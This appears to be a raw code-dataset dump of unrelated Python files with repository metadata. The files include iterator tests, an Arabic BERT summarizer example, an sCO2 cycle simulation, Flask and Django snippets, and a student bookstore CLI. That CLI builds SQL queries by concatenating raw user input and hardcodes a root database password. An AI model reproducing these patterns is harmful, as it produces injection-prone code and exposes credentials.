cv2.waitKey(0)
return lines | 30.383838 | 128 | 0.65758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 122 | 0.040559 |
4476220506d945bb783299ab9c689b2af1b83a67 | 1,363 | py | Python | tests/test_modifiers.py | mbillingr/friendly-iter | 77e1ce72100f592b6155a2152fcc03165af22714 | [
"MIT"
] | null | null | null | tests/test_modifiers.py | mbillingr/friendly-iter | 77e1ce72100f592b6155a2152fcc03165af22714 | [
"MIT"
] | null | null | null | tests/test_modifiers.py | mbillingr/friendly-iter | 77e1ce72100f592b6155a2152fcc03165af22714 | [
"MIT"
] | null | null | null | from unittest.mock import Mock
import pytest
from friendly_iter.iterator_modifiers import flatten, take, skip, step
def test_flatten():
result = flatten([range(4), [], [4, 5]])
assert list(result) == [0, 1, 2, 3, 4, 5]
def test_take_limits_number_of_resulting_items():
result = take(3, range(10))
assert list(result) == [0, 1, 2]
def test_take_works_if_iterator_is_too_short():
result = take(10, range(3))
assert list(result) == [0, 1, 2]
def test_skip_drops_first_n_elements():
result = skip(2, [1, 2, 3, 4, 5])
assert list(result) == [3, 4, 5]
def test_skipping_too_many_results_in_empty_iterator():
result = skip(3, [1, 2])
assert list(result) == []
def test_skip_advanced_iterator_lazily():
skip(3, FailingIter()) # should not raise
def test_refuse_stepsize_less_than_one():
with pytest.raises(ValueError):
step(0, [])
def test_step_size_one_is_an_identity_operation():
it = Mock()
result = step(1, it)
assert result is it
def test_step_always_yields_first_element():
result = step(2, [1])
assert list(result) == [1]
def test_step_yields_every_nth_item():
result = step(2, [1, 2, 3, 4])
assert list(result) == [1, 3]
class FailingIter:
def __iter__(self):
return self
def __next__(self):
pytest.fail("Iterator was advanced")
| 21.296875 | 70 | 0.663977 | 132 | 0.096845 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.030081 |
44762645211964973e9a09e8d66e0bf5a566fa40 | 189 | py | Python | mysite/documents/urls.py | JarvisDong/Project-CGD | e499e13f358629583faf2778d8ba55852cf4cecf | [
"MIT"
] | null | null | null | mysite/documents/urls.py | JarvisDong/Project-CGD | e499e13f358629583faf2778d8ba55852cf4cecf | [
"MIT"
] | null | null | null | mysite/documents/urls.py | JarvisDong/Project-CGD | e499e13f358629583faf2778d8ba55852cf4cecf | [
"MIT"
] | null | null | null | # URLconf: map the index view in view.py to a URL
from django.conf.urls import url
from . import views
from django.views.generic import TemplateView
app_name = 'documents'
urlpatterns = [] | 27 | 49 | 0.772487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.31746 |
44762b0d5bcbe4b280011acbe66456167cfb82a3 | 7,580 | py | Python | arabert_summarize_example.py | abdullah-abunada/bert-extractive-summarizer | 45e69deed3dcc00c4073cb07507889ff44f1ca72 | [
"MIT"
] | 2 | 2021-10-02T08:12:35.000Z | 2022-01-09T20:41:14.000Z | arabert_summarize_example.py | abdullah-abunada/bert-extractive-summarizer | 45e69deed3dcc00c4073cb07507889ff44f1ca72 | [
"MIT"
] | null | null | null | arabert_summarize_example.py | abdullah-abunada/bert-extractive-summarizer | 45e69deed3dcc00c4073cb07507889ff44f1ca72 | [
"MIT"
] | 1 | 2021-12-29T21:53:31.000Z | 2021-12-29T21:53:31.000Z | from summarizer import Summarizer
from transformers import AutoTokenizer, AutoModel
from rouge import Rouge
body='''
أعلن اليوم الخميس في ماليزيا عن دخول ملك البلاد في حجر صحي بعد إصابة 7 عاملين في القصر بفيروس كورونا، ليكون بذلك أحدث زعماء العالم التحاقا بقائمة القادة الذين تحوم حولهم شبهة الإصابة بهذا الفيروس.
وقال مشرف القصر الوطني في ماليزيا أحمد فاضل شمس الدين اليوم إن الملك السلطان عبد الله رعاية الدين المصطفى بالله شاه والملكة الحاجة عزيزة أمينة ميمونة الإسكندرية قد خضعا لفحص طبي واختبار تشخيصي للفيروس، حيث جاءت نتائج تحاليلهما سلبية.
وقال إن الملك والملكة يخضعان حاليا للحجر الصحي في القصر، ولن يقبلا أي زيارة أو مقابلة رسمية إلى أن تنتهي فترة الحجر الصحي التي بدأت أمس ومن المقرر أن تستمر لمدة 14 يوما.
ويوم أمس الأربعاء، أعلن مقر إقامة ولي العهد البريطاني الأمير تشارلز إصابة الأمير بفيروس كورونا.
وقال متحدث باسم مقر إقامة الأمير تشارلز ثبتت إصابة الأمير تشارلز بفيروس كورونا، لقد ظهرت عليه أعراض طفيفة لكن صحته جيدة، وكان يعمل من البيت طوال الأيام الماضية كالمعتاد.
ومساء الأحد الماضي، أعلن في ألمانيا عن الاشتباه في إصابة المستشارة الألمانية أنجيلا ميركل بفيروس، وخضوعها لحجر منزلي رغم أن نتائج الفحوص التي أجرتها كانت سلبية، ومع ذلك قررت الخضوع للحجر الصحي والبقاء في المنزل.
في دوائر السلطة وقصور الحكم وخلال الأسابيع الماضية ومع اتساع دائرة العدوى وعدد الإصابات بفيروس كورونا في عدة دول ومناطق عبر العالم، بدأ الفيروس تدريجيا يقترب من مراكز اتخاذ القرار، وربما يعرض حياة قادة ومسؤولين كبار للخطر.
وخضع الرئيس الأميركي دونالد ترامب لفحص تأكد بعده أنه غير مصاب، وذلك بعد لقائه بوفد برازيلي أحد أفراده مصاب بالفيروس.
ولاحقا، أعلنت السلطات البرازيلية أن الوزير الذي التقى ترامب مصاب بالفيروس، كما وضع الرئيس جايير بولسونارو تحت المراقبة الصحية للتأكد من عدم إصابته.
وذكرت وسائل إعلام برازيلية اليوم أن سكرتير الرئيس أيضا مصاب بكورونا ووضع في الحجر الصحي.
كما خضع مايك بنس نائب الرئيس الأميركي وزوجته للفحص بعد إصابة موظف في مكتبه بالفيروس.
وخلال الأسابيع الماضية أعلنت السلطات النرويجية أن الملك هارالد الخامس والملكة وكامل أعضاء الحكومة وضعوا في الحجر الصحي بسبب الفيروس.
وفي كندا، قرر رئيس الوزراء جاستن ترودو العمل من منزله بعدما تبين أن زوجته صوفي غريغوار مصابة بالوباء.
وفي فرنسا، أصيب وزير الثقافة فرانك ريستر بفيروس كورونا، كما أصيب أيضا 10 نواب على الأقل، في حين تقرر نقل اجتماعات مجلس الوزراء من القاعة التي تعقد فيها تقليديا إلى أخرى أكبر مساحة لضمان ترتيب المقاعد على مسافة متر على الأقل.
كما أعلنت وزارة الدفاع الأميركية في وقت سابق أن الوزير مارك إسبر ونائبه وضعا في الحجر الصحي بعد تأكيد إصابة عشرات من طاقم الوزارة بفيروس كورونا.
وقبل ذلك، أعلن الجيش الأميركي أن قائده في أوروبا إلى جانب عدد من الموظفين ربما تعرضوا لفيروس كورونا خلال مؤتمر عقد في الآونة الأخيرة. كما أعلن قبل أيام مكتب السيناتور الأميركي الجمهوري راند بول أنه أصيب بكورونا المستجد، ليصبح بذلك أول عضو في مجلس الشيوخ تتأكد إصابته بالفيروس.
وسبق لعضو مجلس الشيوخ الأميركي السيناتور تيد كروز أن أعلن عزل نفسه بعدما التقى شخصا ثبتت إصابته بالفيروس.
الاصابات الأكبر في إيران، أصاب الفيروس عددا من المسؤولين، وأدى في بداية الشهر الجاري إلى وفاة عضو مجلس تشخيص مصلحة النظام محمد مير محمدي.
كما أصيب بالوباء علي أكبر ولايتي مستشار المرشد الإيراني، ومعصومة ابتكار نائبة الرئيس الإيراني لشؤون المرأة، وإيرج حريرجي نائب وزير الصحة الإيراني الذي ظهر أمس الجمعة في مؤتمر صحفي عقب تعافيه من المرض.
وفي أستراليا، نقل وزير الداخلية بيتر دوتون إلى المستشفى بعدما ثبتت إصابته بفيروس كورونا، بينما أعلن في إندونيسيا أن وزير النقل بودي كاريا سومادي نقل إلى المستشفى عقب إصابته بالفيروس.
وزراء بوركينا فاسو ولئن كان الفيروس استهدف قادة عدد من الدول ومسؤوليها بشكل فردي غالبا، فقد اختلف الحال في دولة بوركينا فاسو، إذ أصاب عددا من وزرائها بشكل متزامن، ويخشى أن يشل حكومتها إذا تكشفت إصابات جديدة.
وقالت صحيفة لوموند الفرنسية إن بوركينا فاسو هي البلد الأكثر تضررا بوباء كورونا (كوفيد-19) حتى الآن في غربي أفريقيا، حيث توفيت النائبة الثانية لرئيس البرلمان وأصيب خمسة وزراء، إلى جانب الحديث عن إصابة كل من السفير الإيطالي والأميركي، مما أثار غضبا على شبكات التواصل الاجتماعي بسبب ما اعتبر "تراخي" الحكومة في إدارة الوباء.
وقالت الصحيفة في مقال بقلم صوفي دوس مراسلتها في العاصمة واغادوغو إن الأمر اعتبر في البداية أنباء كاذبة، قبل أن يؤكده أصحاب الشأن أنفسهم، فقد أعلن وزير التعليم ستانيسلاس أوارو على فيسبوك إصابته يوم 19 مارس الجاري، قائلا عقب التشخيص ظهر أنني إيجابي بالنسبة لفيروس كورونا، وفي اليوم التالي أعلن نظيراه في الإدارة الإقليمية والمعادن إصابتهما بكورونا.
ولم يتأخر وزير الشؤون الخارجية ألفا باري كثيرا بعدهم، حيث قال بعد يومين فقط من نفي الإشاعة رسميا إنه مصاب بالفيروس لقد تحققت الشائعات، تلقيت للتو اختبارا إيجابيا لكوفيد-19.
وفي 23 مارس الحالي جاء دور وزير التجارة هارونا كابوري ليعلن إصابته هو الآخر، ليكون خامس الوزراء الذين تأكدت إصابتهم من أصل 29 عضوا في حكومة بوركينا فاسو، كما تقول المراسلة، مشيرة كذلك إلى إصابة كل من السفير الإيطالي والأميركي في هذا البلد بكورونا المستجد.
'''
summary_evaluation = '''
أعلن اليوم الخميس في ماليزيا عن دخول ملك البلاد في حجر صحي بعد إصابة 7 عاملين في القصر بفيروس كورونا، ليكون بذلك أحدث زعماء العالم التحاقا بقائمة القادة الذين تحوم حولهم شبهة الإصابة بهذا الفيروس.
ويوم أمس الأربعاء، أعلن مقر إقامة ولي العهد البريطاني الأمير تشارلز إصابة الأمير بفيروس كورونا.
ومساء الأحد الماضي، أعلن في ألمانيا عن الاشتباه في إصابة المستشارة الألمانية أنجيلا ميركل بفيروس، وخضوعها لحجر منزلي رغم أن نتائج الفحوص التي أجرتها كانت سلبية، ومع ذلك قررت الخضوع للحجر الصحي والبقاء في المنزل.
في دوائر السلطة وقصور الحكم وخلال الأسابيع الماضية ومع اتساع دائرة العدوى وعدد الإصابات بفيروس كورونا في عدة دول ومناطق عبر العالم، بدأ الفيروس تدريجيا يقترب من مراكز اتخاذ القرار، وربما يعرض حياة قادة ومسؤولين كبار للخطر.
ولاحقا، أعلنت السلطات البرازيلية أن الوزير الذي التقى ترامب مصاب بالفيروس، كما وضع الرئيس جايير بولسونارو تحت المراقبة الصحية للتأكد من عدم إصابته.
وخضع الرئيس الأميركي دونالد ترامب لفحص تأكد بعده أنه غير مصاب، وذلك بعد لقائه بوفد برازيلي أحد أفراده مصاب بالفيروس.
وخلال الأسابيع الماضية أعلنت السلطات النرويجية أن الملك هارالد الخامس والملكة وكامل أعضاء الحكومة وضعوا في الحجر الصحي بسبب الفيروس.
وفي كندا، قرر رئيس الوزراء جاستن ترودو العمل من منزله بعدما تبين أن زوجته صوفي غريغوار مصابة بالوباء.
وفي فرنسا، أصيب وزير الثقافة فرانك ريستر بفيروس كورونا، كما أصيب أيضا 10 نواب على الأقل، في حين تقرر نقل اجتماعات مجلس الوزراء من القاعة التي تعقد فيها تقليديا إلى أخرى أكبر مساحة لضمان ترتيب المقاعد على مسافة متر على الأقل.
كما أعلنت وزارة الدفاع الأميركية في وقت سابق أن الوزير مارك إسبر ونائبه وضعا في الحجر الصحي بعد تأكيد إصابة عشرات من طاقم الوزارة بفيروس كورونا.
الاصابات الأكبر في إيران، أصاب الفيروس عددا من المسؤولين، وأدى في بداية الشهر الجاري إلى وفاة عضو مجلس تشخيص مصلحة النظام محمد مير محمدي.
وزراء بوركينا فاسو ولئن كان الفيروس استهدف قادة عدد من الدول ومسؤوليها بشكل فردي غالبا، فقد اختلف الحال في دولة بوركينا فاسو، إذ أصاب عددا من وزرائها بشكل متزامن، ويخشى أن يشل حكومتها إذا تكشفت إصابات جديدة.
وقالت صحيفة لوموند الفرنسية إن بوركينا فاسو هي البلد الأكثر تضررا بوباء كورونا (كوفيد-19) حتى الآن في غربي أفريقيا، حيث توفيت النائبة الثانية لرئيس البرلمان وأصيب خمسة وزراء، إلى جانب الحديث عن إصابة كل من السفير الإيطالي والأميركي، مما أثار غضبا على شبكات التواصل الاجتماعي بسبب ما اعتبر "تراخي" الحكومة في إدارة الوباء.
ولم يتأخر وزير الشؤون الخارجية ألفا باري كثيرا بعدهم، حيث قال بعد يومين فقط من نفي الإشاعة رسميا إنه مصاب بالفيروس لقد تحققت الشائعات، تلقيت للتو اختبارا إيجابيا لكوفيد-19.
'''
albert_model = AutoModel.from_pretrained('asafaya/bert-base-arabic')
albert_tokenizer = AutoTokenizer.from_pretrained('asafaya/bert-base-arabic')
modelSummarizer = Summarizer(custom_model=albert_model, custom_tokenizer=albert_tokenizer)
result = modelSummarizer(body)
generated_summary = ''.join(result)
print(generated_summary)
rouge = Rouge()
scores = rouge.get_scores(generated_summary, summary_evaluation)
print(scores)
| 118.4375 | 346 | 0.812797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,800 | 0.961394 |
44776d097711791cd8a71768586b334500f83487 | 3,669 | py | Python | samples/CSP/sco2_analysis_python/examples/examples_main.py | ozsolarwind/SAM | 0967b0a4be8f8924ec1ad915a14575ac22c4ec3c | [
"MIT"
] | null | null | null | samples/CSP/sco2_analysis_python/examples/examples_main.py | ozsolarwind/SAM | 0967b0a4be8f8924ec1ad915a14575ac22c4ec3c | [
"MIT"
] | null | null | null | samples/CSP/sco2_analysis_python/examples/examples_main.py | ozsolarwind/SAM | 0967b0a4be8f8924ec1ad915a14575ac22c4ec3c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 9 10:56:12 2017
@author: tneises
"""
import json
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.lines as mlines
import sys
import os
absFilePath = os.path.abspath(__file__)
fileDir = os.path.dirname(os.path.abspath(__file__))
parentDir = os.path.dirname(fileDir)
newPath = os.path.join(parentDir, 'core')
sys.path.append(newPath)
import sco2_cycle_ssc as sco2_solve
import sco2_plots as cy_plt
##########################################
"Cycle design simulation with default parameters"
c_sco2 = sco2_solve.C_sco2_sim(1) # Initialize to the recompression cycle default (1)
c_sco2.solve_sco2_case() # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__default_pars") # Save design solution dictionary
sol_dict__default_pars = c_sco2.m_solve_dict
##########################################
"Plotting a cycle design"
c_plot = cy_plt.C_sco2_TS_PH_plot(sol_dict__default_pars)
c_plot.is_save_plot = True
c_plot.file_name = "cycle_design_plots__default_pars"
c_plot.plot_new_figure()
##########################################
"Modifying the cycle design parameters"
mod_base_dict = {"T_htf_hot_des" : 620, "cycle_config" : 2}
c_sco2.overwrite_des_par_base(mod_base_dict) # Overwrite baseline design parameters
c_sco2.solve_sco2_case() # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code with"
"modified design parameters solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__modified_pars") # Save design solution dictionary
sol_dict__mod_pars = c_sco2.m_solve_dict
##########################################
"Comparing two cycle designs"
c_comp_plot = cy_plt.C_sco2_TS_PH_overlay_plot(sol_dict__default_pars, sol_dict__mod_pars)
c_comp_plot.is_save_plot = True
c_comp_plot.plot_new_figure()
##########################################
"Running a parametric study on one design parameter"
c_sco2.reset_des_par_base_to_default_RC()
T_HTF_in_par_list = list(np.arange(570,721,25))
T_HTF_in_par_dict_list = []
for T_HTF_in in T_HTF_in_par_list:
T_HTF_in_par_dict_list.append({"T_htf_hot_des" : T_HTF_in})
c_sco2.solve_sco2_parametric(T_HTF_in_par_dict_list)
print("\nDid the parametric analyses solve successfully = ",c_sco2.m_par_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_par_solve_dict("T_HTF_parametric")
sol_dict_parametric = c_sco2.m_par_solve_dict
##########################################
"Plotting a 1D parametric study"
par_plot = cy_plt.C_des_stacked_outputs_plot([sol_dict_parametric])
par_plot.x_var = "T_HTF"
par_plot.y_vars = ["eta","MC_P_in","PHX_dT"]
par_plot.is_legend = False
par_plot.max_rows = 2
par_plot.is_save = True;
par_plot.file_name = "T_HTF_par_plot"
par_plot.create_plot()
##########################################
"Plotting one cycle design from a parametric solution dictionary"
i_plot = len(sol_dict_parametric["T_htf_hot_des"]) - 1
dict_i_plot = sco2_solve.get_one_des_dict_from_par_des_dict(sol_dict_parametric, "T_htf_hot_des", i_plot)
c_i_cycle_plot = cy_plt.C_sco2_TS_PH_plot(dict_i_plot)
c_i_cycle_plot.is_save_plot = True
c_i_cycle_plot.file_name = "cycle_design_plots__T_HTF_hottest"
c_i_cycle_plot.plot_new_figure()
##########################################
##########################################
##########################################
##########################################
##########################################
| 34.613208 | 105 | 0.693922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,539 | 0.41946 |
4477c20c7b94d6aa48f1758a3091efc8952c26c4 | 11,944 | py | Python | Application/StudentModule.py | nimitpatel26/Book-Fetch | 1d23ff273206dd31d3c05d038468cb407cd886d1 | [
"MIT"
] | null | null | null | Application/StudentModule.py | nimitpatel26/Book-Fetch | 1d23ff273206dd31d3c05d038468cb407cd886d1 | [
"MIT"
] | null | null | null | Application/StudentModule.py | nimitpatel26/Book-Fetch | 1d23ff273206dd31d3c05d038468cb407cd886d1 | [
"MIT"
] | null | null | null | from random import randint
import datetime
import pymysql
import cgi
def getConnection():
return pymysql.connect(host='localhost',
user='root',
password='w0rkb3nch',
db='BookFetch')
def newStudent():
fName = input("First Name:\t ")
lName = input("Last Name:\t ")
email = input("Email:\t ")
telephone = input("Telephone [##########]:\t ")
street = input("Street:\t ")
city = input("City:\t ")
state = input("State:\t ")
country = input("Country:\t ")
major = input("Major:\t ")
status = input("Undergrad/Graduate:\t ")
year = input("Year [#]:\t ")
print("-----University is a foreign key constraint!-----")
university = input("University:\t ")
dob = input("DOB:\t ")
id = fName[:2] + lName[:2] + "St" + str(randint(100, 999))
id = id.upper()
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("insert into Users values (\"" + id + "\", \"" + fName
+ "\", \"" + lName + "\", \"" + email + "\", \"" + street + "\", \"" + city
+ "\", \"" + state + "\", \"" + country + "\");")
cursor.execute(sql)
sql = ("insert into PhoneNumbers values (\"" + id + "\", " + telephone + ");")
cursor.execute(sql)
sql = ("insert into Students values (\"" + id + "\", \"" + major + "\", " + year + ", \""
+ university + "\", \"" + dob + "\", \"" + status + "\");")
cursor.execute(sql)
finally:
connection.close()
def newCart():
now = datetime.datetime.now()
currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
print("-----If the already has a cart created then it will be an error.-----")
firstName = input("Enter student's first name: ")
lastName = input("Enter student's last name: ")
bookTitle = input("Enter the book title: ")
rentBuy = input("Enter purchase type (rent/buy): ")
quantity = input("Enter quantity: ")
wishlist = input("Wishlist (y/n): ")
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("insert into Cart values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"),"
+ "(select ISBN from BookDetails where Title = \"" + bookTitle + "\"), \"" + rentBuy + "\", " + quantity
+ ", \"" + wishlist + "\");")
cursor.execute(sql)
sql = ("insert into CartDateCreated values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"), \""
+ currentDate + "\");"
)
cursor.execute(sql)
sql = ("insert into CartDateUpdated values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"), \""
+ currentDate + "\");"
)
cursor.execute(sql)
except:
print(cursor)
finally:
connection.close()
def newOrder():
now = datetime.datetime.now()
currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
print("-----Enter the name of the user whose cart will be turned into order.-----")
firstName = input("Enter student's first name: ")
lastName = input("Enter student's last name: ")
sType = input("Shipping type: ")
ccNumber = input("Credit card number: ")
ccExpiration = input("Credit card expiration: ")
ccName = input("Credit card name: ")
ccType = input("Credit card type: ")
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("select * from Cart where Cart.StudentID = ("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\");")
cursor.execute(sql)
commands = []
for i in cursor:
if (i[4] == "n"):
sql = ("insert into Orders values(\"" + i[0] + "\", "
+ str(i[1]) + ", \"" + i[2] + "\", " + str(i[3])
+ ", \"" + currentDate + "\", \"\", \""
+ sType + "\", \"" + ccNumber + "\", \""
+ ccExpiration + "\", \"" + ccName + "\", \"" + ccType
+ "\", \"" + "new\");")
commands.append(sql)
sql = ("delete from cart where StudentID = \""
+ i[0] + "\" and ISBN = " + str(i[1]) + ";")
commands.append(sql)
sql = ("update CartDateUpdated set DUpdated = \"" + currentDate
+ "\" where StudentID"
+ " = \"" + i[0] + "\";"
)
commands.append(sql)
for i in commands:
cursor.execute(i)
finally:
connection.close()
def newRating():
print("-----Enter the name of the user who will rate a book.-----")
firstName = input("Enter student's first name: ")
lastName = input("Enter student's last name: ")
bookTitle = input("Enter book title: ")
bookRating = input("Your rating [0-5]: ")
ratingTitle = input("Rating title: ")
ratingDescription = input("Rating description: ")
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("insert into BReviewed values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"), \""
+ ratingTitle + "\", " + bookRating
+ ", (select ISBN from BookDetails where Title = \"" + bookTitle + "\"), \""
+ ratingDescription + "\");")
cursor.execute(sql)
finally:
connection.close()
def updateCart():
print("-----Enter the name of the user who's cart you will modify.-----")
firstName = input("Enter student's first name: ")
lastName = input("Enter student's last name: ")
cartOptions = (
"""Here are your options:
1) Add to cart
2) Delete from cart
Enter [1-2]: """)
userInput = input(cartOptions)
if (userInput == 1):
addToCart(firstName, lastName)
elif (userInput == 2):
deleteFromCart(firstName, lastName)
def addToCart(firstName, lastName):
now = datetime.datetime.now()
currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
bookTitle = input("Enter the book title: ")
rentBuy = input("Enter purchase type (rent/buy): ")
quantity = input("Enter quantity: ")
wishlist = input("Wishlist (y/n): ")
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("insert into Cart values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"),"
+ "(select ISBN from BookDetails where Title = \"" + bookTitle + "\"), \"" + rentBuy + "\", " + quantity
+ ", \"" + wishlist + "\");")
cursor.execute(sql)
sql = ("insert into CartDateUpdated values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"), \""
+ currentDate + "\");"
)
cursor.execute(sql)
finally:
connection.close()
def deleteFromCart(firstName, lastName):
now = datetime.datetime.now()
currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("select * from Cart where StudentID = ("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\");")
cursor.execute(sql)
print("\nHere is the cart of " + firstName + " " + lastName)
counter = 0
commands = []
for i in cursor:
print(str(counter) + ") " + i[0] + " " + str(i[1]) + " " + i[2] + " " + str(i[3]) + " " + i[4])
sql = ("delete from Cart where StudentID = \"" + i[0] + "\" and ISBN = " + str(i[1]) + ";")
commands.append(sql)
counter = counter + 1
deleteItem = input("Enter the number of item that you want to delete [0-"
+ str(counter - 1) + "]: ")
cursor.execute(commands[int(deleteItem)])
sql = ("insert into CartDateUpdated values(("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\"), \""
+ currentDate + "\");"
)
cursor.execute(sql)
finally:
connection.close()
def cancelOrder():
print("-----Enter the name of the user who's order you will modify.-----")
firstName = input("Enter student's first name: ")
lastName = input("Enter student's last name: ")
connection = getConnection()
connection.autocommit(True)
try:
with connection.cursor() as cursor:
sql = ("select * from Orders where StudentID = ("
+ "select ID from Users where FirstName = \""
+ firstName + "\" and " + "LastName = \"" + lastName + "\");")
cursor.execute(sql)
print("\nHere are the orders of " + firstName + " " + lastName)
counter = 0
commands = []
for i in cursor:
print(str(counter) + ") " + i[0] + " " + str(i[1]) + " " + i[2] + " " + str(i[3]) + " " + i[4])
sql = ("delete from Orders where StudentID = \"" + i[0] + "\" and BookISBN = " + str(i[1])
+ " and RentBuy = \"" + i[2] + "\" and DateCreated = \"" + i[4] + "\";")
commands.append(sql)
counter = counter + 1
deleteItem = input("Enter the number of item that you want to delete [0-"
+ str(counter - 1) + "]: ")
cursor.execute(commands[int(deleteItem)])
finally:
connection.close()
def studentModuleMain():
welcomeMsg = ("---------------------\nStudent Module\n---------------------")
mainOptionsMsg = (
"""Here are your options:
1) Create a new student
2) Create a cart for a user
3) Create a new order based on a cart
4) Create a new book rating
5) Update a cart
6) Cancel an order
7) Return
8) Quit
Enter [1-8]: """)
invalidInputMsg = "Invalid input, please enter a valid input."
print(welcomeMsg)
userInput = int(input(mainOptionsMsg))
print("\n")
while(userInput < 1 or userInput > 8):
print(invalidInputMsg)
userInput = int(input(mainOptionsMsg))
print("\n")
if (userInput == 1):
newStudent()
elif (userInput == 2):
newCart()
elif (userInput == 3):
newOrder()
elif (userInput == 4):
newRating()
elif (userInput == 5):
updateCart()
elif (userInput == 6):
cancelOrder()
elif (userInput == 7):
return
elif (userInput == 8):
quit()
studentModuleMain()
| 36.525994 | 123 | 0.48786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,964 | 0.331882 |
447b46504e3f133d3560744b576f31426d682d53 | 1,242 | py | Python | app/main/forms.py | macymuhia/Blogspot | b1a578a4120bebb2c4c2a57201ac43eec7a161e9 | [
"MIT"
] | null | null | null | app/main/forms.py | macymuhia/Blogspot | b1a578a4120bebb2c4c2a57201ac43eec7a161e9 | [
"MIT"
] | 6 | 2021-02-08T20:33:48.000Z | 2022-03-11T23:56:14.000Z | app/main/forms.py | macymuhia/Blogspot | b1a578a4120bebb2c4c2a57201ac43eec7a161e9 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField, SelectField
from wtforms.validators import Required
class BlogForm(FlaskForm):
blog_title = StringField("Blog title", validators=[Required()])
blog_description = StringField("Blog description", validators=[Required()])
story = TextAreaField("Blog content", validators=[Required()])
category = SelectField(
"Category",
choices=[
("Gaming", "Gaming"),
("Career", "Career"),
("Technology", "Technology"),
("Sports", "Sports"),
("Fitness", "Fitness"),
],
validators=[Required()],
)
submit = SubmitField("Post")
class CommentForm(FlaskForm):
details = TextAreaField("Your comment", validators=[Required()])
submit = SubmitField("Comment")
class UpdateProfile(FlaskForm):
bio = TextAreaField("Tell us about you.", validators=[Required()])
submit = SubmitField("Submit")
# class DeletePost(FlaskForm):
# comment_id = StringField()
# delete = SubmitField('Delete')
class UpdateProfile(FlaskForm):
bio = TextAreaField("Tell us about you.", validators=[Required()])
submit = SubmitField("Submit")
| 27 | 79 | 0.650564 | 981 | 0.789855 | 0 | 0 | 0 | 0 | 0 | 0 | 327 | 0.263285 |
447c96e01f699a1d061bedede73a165b4923aa49 | 404 | py | Python | backend/apps/role/migrations/0003_auto_20200329_1414.py | highproformas-friends/curaSWISS | cf6c1ac9c0c80026f1667a7155290c37be8dec7c | [
"MIT"
] | 3 | 2020-03-27T20:39:31.000Z | 2020-03-31T20:24:55.000Z | backend/apps/role/migrations/0003_auto_20200329_1414.py | highproformas-friends/curaSWISS | cf6c1ac9c0c80026f1667a7155290c37be8dec7c | [
"MIT"
] | 21 | 2020-03-28T09:57:15.000Z | 2020-03-31T11:38:00.000Z | backend/apps/role/migrations/0003_auto_20200329_1414.py | highproformas-friends/curaSWISS | cf6c1ac9c0c80026f1667a7155290c37be8dec7c | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-03-29 14:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('role', '0002_auto_20200329_1412'),
]
operations = [
migrations.AlterField(
model_name='role',
name='name',
field=models.CharField(default='', max_length=50, unique=True),
),
]
| 21.263158 | 75 | 0.596535 | 311 | 0.769802 | 0 | 0 | 0 | 0 | 0 | 0 | 92 | 0.227723 |
447d2c4718f328072ba8ec1b22b096da2c86ad41 | 2,210 | py | Python | goslinks/db/models.py | RevolutionTech/goslinks | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | [
"0BSD"
] | 1 | 2020-01-22T20:49:38.000Z | 2020-01-22T20:49:38.000Z | goslinks/db/models.py | RevolutionTech/goslinks | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | [
"0BSD"
] | 99 | 2019-06-04T06:12:04.000Z | 2021-10-09T22:18:42.000Z | goslinks/db/models.py | RevolutionTech/goslinks | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | [
"0BSD"
] | null | null | null | from pynamodb.attributes import UnicodeAttribute
class UserModel:
class Meta:
table_name = "goslinks-users"
read_capacity_units = 1
write_capacity_units = 1
email = UnicodeAttribute(hash_key=True)
name = UnicodeAttribute()
photo = UnicodeAttribute()
@property
def organization(self):
_, o = self.email.split("@")
return o
@classmethod
def update_or_create_user(cls, user_info):
email = user_info["email"]
try:
user = cls.get(email)
except cls.DoesNotExist:
user = cls(email)
user.name = user_info["name"]
user.photo = user_info["picture"]
user.save()
return user
class LinkModel:
class Meta:
table_name = "goslinks-links"
read_capacity_units = 1
